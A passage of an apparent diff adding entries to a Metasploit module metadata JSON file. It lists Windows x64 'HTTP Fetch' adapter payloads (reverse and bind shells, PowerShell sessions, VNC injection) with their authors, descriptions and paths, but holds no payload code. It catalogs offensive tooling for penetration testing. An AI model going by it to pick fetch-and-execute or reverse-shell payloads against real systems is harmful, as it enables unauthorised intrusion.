14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/powershell_bind_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/windows/http/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/powershell_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/windows/http/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [ + 
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/powershell_reverse_tcp_ssl": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/windows/http/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/http/x64/shell/bind_ipv6_tcp": { + "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": 
"payload/cmd/windows/http/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid", + 
"check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/http/x64/shell/bind_named_pipe": { + "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/http/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/http/x64/shell/bind_tcp": { + "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an 
x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/http/x64/shell/bind_tcp_rc4": { + "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": 
"windows/x64/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/http/x64/shell/bind_tcp_uuid": { + "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/http/x64/shell/reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/http/x64/shell/reverse_tcp_rc4": { + "name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/http/x64/shell/reverse_tcp_uuid": { + 
"name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/http/x64/shell_bind_tcp": { + "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/http/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": 
"cmd/windows/http/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/shell_reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/http/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/vncinject/bind_ipv6_tcp": { + "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": 
"Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": 
"windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/http/x64/vncinject/bind_named_pipe": { + "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/http/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/http/x64/vncinject/bind_tcp": { + "name": "HTTP Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": 
"cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/http/x64/vncinject/bind_tcp_rc4": { + "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": 
"windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/http/x64/vncinject/bind_tcp_uuid": { + "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_http": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", 
+ "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_https": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_https", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": 
"windows/x64/reverse_https" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_tcp_rc4": { + "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", 
+ "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_tcp_uuid": { + "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": 
